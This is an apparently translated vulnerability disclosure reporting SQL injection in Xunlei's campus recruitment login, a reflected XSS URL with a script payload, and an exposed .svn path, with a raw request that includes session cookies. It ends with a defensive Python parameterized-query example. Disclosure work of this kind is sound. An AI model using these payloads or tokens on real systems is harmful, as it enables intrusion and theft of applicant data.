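2015-01-03: Details reported to the vendor; awaiting vendor response
2015-01-04: Vendor confirmed; details disclosed to the vendor only
2015-01-14: Details disclosed to core white hats and relevant domain experts
2015-01-24: Details disclosed to regular white hats
2015-02-03: Details disclosed to intern white hats
2015-02-17: Details disclosed to the public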
I hear Xunlei is a good company.
There is an injection in the login of Xunlei's campus recruitment site: http://campus.xunlei.com/
GET /login?account=aaa%40test.com&pwd=admin&from=mo&callback=jQuery183006059867197172708_1420216468993&_=1420216825050 HTTP/1.1
Host: svr.campus.xunlei.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://campus.xunlei.com/mobile/t/login.html
Cookie: pgv_pvi=8017659823; niuxbbs_8763_saltkey=qmc2M2bV; niuxbbs_8763_lastvisit=1420161936; niuxbbs_8763_sid=iEEb9r; niuxbbs_8763_lastact=1420165616%09home.php%09space; _ga=GA1.2.977311208.1420171555; check_e=AQAB; check_n=ojx%2Fc8S645rVboX1LNLZyFrRze18YlpFCzh4rxTwS2N7yTALd6%2BSIewRa4p26y2TA4OXvOZf29E9k1onzu95E8qWXxfQs0lI5e6Y%2BAs7qw0%2F52Iw%2B8YabQhYxyFALLRdwZZ9R%2F%2FL9W8XXejTPKRhmxZz9JRrwlCFfioGfDjkyzjS%2FFu531puZHdFi7G1gSKxbp7V0L7YL%2B0iSQOrPyeC5c7eivOsLzq%2Fkv9yKtF7PtNK0QWAKfum8HtqhBuI4y7CwuqRebhzl6Z5cZWJg8hsqgEeMHvvIaxUROzROSGMiJzvCt7Ms7DxY4rOPdyCFb1hBvl5L7CCafguOvJ0fovI5w%3D%3D; _x_t_=0; userid=347711301; sessionid=A51904D69B0738C9006FF784C8418EFBB86360247C6D1E251B780CF57EDD272FF8286E401DBB995117EB10B16C724DED58D6F968FF3E2E0191F20B9B9796802D; nickname=Gankme; __utma=166345655.977311208.1420171555.1420210757.1420210757.1; __utmc=166345655; __utmz=166345655.1420210757.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); usrname=; active=1; downbyte=0; downfile=0; isspwd=0; isvip=0; jumpkey=D252A52542409BDC1DFEC96D44B57E75DFB344C58A67B67A32A1C64FA39611B287EDEA1BE8274128B88E6EC717DE6079B5E33D9119D255F4ED07D9CCD9F799B50A9EA7BA1C76E294827CF5210BA8053FB352FB8181AE23FFFE87FC35AF6C3094; logintype=1; onlinetime=0; order=165908730; safe=0; score=200; sex=u; upgrade=0; usernewno=xxxxx; usernick=xxx; usertype=0
Connection: keep-alive
How many résumés are in there... you know >..<
Buy one, get one free: XSS
http://player.client.daquan.xunlei.com/player.php?source_id=16245%273&type=movie&source_type=&title=%3C/title%3E%3Cscript%3Ealert%281%29%3C/script%3E&play_link=&flash_play_link=&ts=1355167569
.svn
widget.xunlei.com/js/.svn/entries
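The data dumped through the injection during testing has been deleted! Nothing was kept!
Filter the input >..< Don't trust the JS checks too much.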
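
The advice above (filter the input, don't rely on JS checks) as an added example, not code from the report or from the vendor: a login lookup on `account` and `pwd` in its string-built form beside a server-side form with a format check and bound parameters. The SQLite schema, the sample account, the function names and the probe input are all constructed for illustration.

```python
import hashlib
import hmac
import re
import sqlite3

def hash_pwd(pwd):
    # SHA-256 keeps the example short; real code should use a password KDF.
    return hashlib.sha256(pwd.encode()).hexdigest()

def make_db():
    # Constructed schema and account; the real tables are not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (account TEXT PRIMARY KEY, pwd_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("aaa@test.com", hash_pwd("constructed-password")))
    return db

def login_concat(db, account, pwd):
    """'Before' form: request values are pasted into the SQL text."""
    sql = ("SELECT 1 FROM users WHERE account = '%s' AND pwd_hash = '%s'"
           % (account, hash_pwd(pwd)))
    return db.execute(sql).fetchone() is not None

# Apostrophes are legal in e-mail local parts, so the format check cannot
# be what protects the query; the bound parameter does that.
ACCOUNT_RE = re.compile(r"[A-Za-z0-9._%+'-]{1,64}@[A-Za-z0-9.-]{1,255}")

def login_param(db, account, pwd):
    """Hardened form: server-side format check plus bound parameters."""
    if not ACCOUNT_RE.fullmatch(account):  # enforced on the server, not only in JS
        return False
    row = db.execute("SELECT pwd_hash FROM users WHERE account = ?",
                     (account,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], hash_pwd(pwd))

def probe(login_fn, account, pwd):
    """Classify one login attempt the way a server log would see it."""
    try:
        return "ok" if login_fn(make_db(), account, pwd) else "denied"
    except sqlite3.Error:
        return "sql-error"  # the input reached the SQL parser as syntax

if __name__ == "__main__":
    for fn in (login_concat, login_param):
        print(fn.__name__, probe(fn, "o'brien@test.com", "x"))
```

A `sql-error` result for an input that merely contains a quote is the server-side signal that request data is being parsed as SQL; the bound-parameter form treats the same input as plain data.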
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-01-04 09:52
Thanks for the feedback!
None yet